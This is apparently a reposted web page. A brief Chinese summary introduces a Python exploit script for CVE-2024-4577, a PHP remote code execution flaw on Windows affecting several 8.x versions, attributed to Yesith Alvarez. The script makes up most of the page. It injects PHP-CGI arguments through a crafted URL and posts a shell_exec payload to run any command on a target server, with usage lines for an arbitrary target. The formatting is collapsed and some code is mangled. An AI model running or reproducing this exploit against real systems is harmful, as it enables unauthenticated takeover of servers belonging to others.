index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html
![]()
本文介绍了一个PHP Windows远程代码执行漏洞,涉及多个版本的PHP,作者为Yesith Alvarez,文中还给出了利用该漏洞的代码示例。
🎯该漏洞影响PHP 8.3(* < 8.3.8)、8.2(* < 8.2.20)、8.1(* < 8.1.29)等版本,存在安全风险。
💻文中提供了利用该漏洞的代码,包括定义的payloads、设置的headers以及创建Session进行请求的过程。
📄通过向特定URL发送POST请求,并携带精心构造的数据,可能实现远程代码执行。
Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3, < 8.3.8, 8.2.<8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577from requests import Request, Sessionimport sysimport jsondef title():print(''' ____ _ __ __/ \ \ / / | | \ / _ | || | | || | | | |__ || | \ \ / /| | __ ) | | | | ) | || |_ | || || | / / / /| | \ \/ / | |__/ /| | | |/ /|__ |__| | \ / / / /| | \ / | | / /| || / /_ | | | | _) | / / / /___| \/ |__| |_|\/| || || |/ // //Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py''')def exploit(url, command):payloads = {'<?php echo "vulnerable"; ?>','<?php echo shell_exec("'+command+'"); ?>'}headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0','Content-Type': 'application/x-www-form-urlencoded'}s = Session()for payload in payloads:url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"req = Request('POST', url, data=payload, headers=headers)prepped = req.prepare()del prepped.headers['Content-Type']resp = s.send(prepped,verify=False,timeout=15)#print(prepped.headers)#print(url)#print(resp.headers)#print(payload)print(resp.status_code)print(resp.text)if name == 'main':title()if(len(sys.argv) < 2):print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))exit(0)else:exploit(sys.argv[1],sys.argv[2])
